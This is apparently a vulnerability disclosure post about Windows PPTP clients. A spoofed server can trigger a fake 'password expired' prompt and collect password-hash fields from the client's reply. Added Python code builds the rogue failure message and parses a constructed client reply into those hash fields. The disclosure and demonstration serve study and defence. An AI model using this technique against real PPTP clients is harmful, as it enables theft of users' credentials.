In case you didn't catch it, I wrote a little article for Phrack summarizing the different PPTP vulnerabilities. All of it has already been discussed except for one item. I mentioned this vulnerability on NTBugTraq a couple of months ago but no one paid much attention.

To make it short, an attacker that can masquerade as a PPTP server (via DNS cache poisoning, etc.) can obtain the connecting user's password hashes if the user is naive enough to change his password when the server tells him his password has expired.

The problem affects both the Windows NT PPTP client with the latest updates and the latest Windows 95 Dial-Up Networking. Attached you will find a small program that demonstrates the problem. It fixes some minor bugs in the Phrack article (don't you love -Wall -pedantic).
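The attachment mentioned above is not reproduced on this page. As an added illustration of the exchange the post describes (not the author's program, and not the Phrack code), the Python below builds the MS-CHAP Failure text a server sends to announce an expired password (RFC 2433: "E=648 R=... C=... V=...") and decodes the Change-Password Packet (version 1, Code 5, 72 octets) a client answers it with, whose four 16-octet fields carry the old and new LM and NT password hashes, each encrypted with the hash of the other password. The packet bytes are constructed for the example, not captured traffic; the byte order assumed for the two trailing 16-bit fields and the reading of Flags bit 0 are assumptions noted in the code. The parser only extracts the fields, it does not decrypt them.

```python
"""MS-CHAP (RFC 2433) password-expired exchange, as an illustration.

A rogue server that answers the CHAP response with E=648
(ERROR_PASSWD_EXPIRED) receives, from a client that agrees to change its
password, a Change-Password Packet carrying password-hash material.
All packet contents here are constructed for the example.
"""
import re
import struct

# RFC 2433 values used below
ERROR_PASSWD_EXPIRED = 648              # Failure packet "E=648"
CHANGE_PASSWORD_V1_CODE = 5             # Change-Password Packet (version 1)
CHANGE_PASSWORD_V1_LENGTH = 72          # Code, Identifier, Length + 4*16 + 2 + 2

FAILURE_RE = re.compile(r"^E=(\d+) R=([01]) C=([0-9A-Fa-f]{16}) V=(\d+)$")


def build_failure_message(error_code, retry_allowed, challenge, version):
    """Text carried by an MS-CHAP Failure packet: "E=eee R=r C=cc.. V=v".

    This is what a (rogue) server sends to make the client believe its
    password has expired: E=648, a fresh 8-octet challenge, and the
    password-change protocol version it wants the client to use.
    """
    if len(challenge) != 8:
        raise ValueError("challenge must be 8 octets")
    return "E=%d R=%d C=%s V=%d" % (error_code, 1 if retry_allowed else 0,
                                   challenge.hex().upper(), version)


def parse_failure_message(message):
    """Parse the Failure text into its fields; returns None if malformed."""
    m = FAILURE_RE.match(message)
    if not m:
        return None
    return {
        "error": int(m.group(1)),
        "retry": m.group(2) == "1",
        "challenge": bytes.fromhex(m.group(3)),
        "version": int(m.group(4)),
    }


def parse_change_password_v1(packet):
    """Decode a Change-Password Packet (version 1), RFC 2433.

    Layout: Code(1) Identifier(1) Length(2), then four 16-octet fields,
    Encrypted-LM-Old-Password, Encrypted-LM-New-Password,
    Encrypted-NT-Old-Password, Encrypted-NT-New-Password, followed by
    Password-Length(2) and Flags(2). Each Encrypted-* field is the hash of
    one password encrypted with the hash of the other (old under new, new
    under old); this function extracts them without decrypting.
    Assumptions made here: the trailing 16-bit fields are read in network
    byte order, and Flags bit 0 means "NT hash fields valid".
    """
    if len(packet) < 4:
        raise ValueError("short packet")
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if code != CHANGE_PASSWORD_V1_CODE:
        raise ValueError("not a version 1 Change-Password packet (code %d)" % code)
    if length != CHANGE_PASSWORD_V1_LENGTH or len(packet) < length:
        raise ValueError("bad length %d" % length)
    body = packet[4:length]
    names = ("enc_lm_old", "enc_lm_new", "enc_nt_old", "enc_nt_new")
    fields = {name: body[16 * i:16 * (i + 1)] for i, name in enumerate(names)}
    password_length, flags = struct.unpack("!HH", body[64:68])
    fields["identifier"] = ident
    fields["password_length"] = password_length
    fields["nt_hashes_valid"] = bool(flags & 1)
    return fields


# Constructed sample exchange (not captured traffic).
ROGUE_CHALLENGE = bytes.fromhex("0011223344556677")
ROGUE_FAILURE = build_failure_message(ERROR_PASSWD_EXPIRED, True, ROGUE_CHALLENGE, 1)

# Constructed client reply: four recognisable 16-octet blocks stand in for the
# encrypted hash fields; a real client fills them from the user's old and
# new passwords.
SAMPLE_CHANGE_PASSWORD_V1 = (
    struct.pack("!BBH", CHANGE_PASSWORD_V1_CODE, 7, CHANGE_PASSWORD_V1_LENGTH)
    + bytes([0xA1]) * 16 + bytes([0xB2]) * 16
    + bytes([0xC3]) * 16 + bytes([0xD4]) * 16
    + struct.pack("!HH", 9, 1)
)


def rogue_server_harvest(failure_message, client_reply):
    """What the party that sent the 'expired' Failure ends up holding.

    Returns None unless the Failure really announced an expired password.
    """
    f = parse_failure_message(failure_message)
    if f is None or f["error"] != ERROR_PASSWD_EXPIRED:
        return None
    return parse_change_password_v1(client_reply)


if __name__ == "__main__":
    got = rogue_server_harvest(ROGUE_FAILURE, SAMPLE_CHANGE_PASSWORD_V1)
    for k in ("enc_lm_old", "enc_lm_new", "enc_nt_old", "enc_nt_new"):
        print(k, got[k].hex())
```

The point the decoder makes visible is that nothing in the Change-Password reply is bound to the legitimate server: whoever produced the "E=648" Failure is the party that receives the four encrypted hash fields, which is exactly the exposure the post describes.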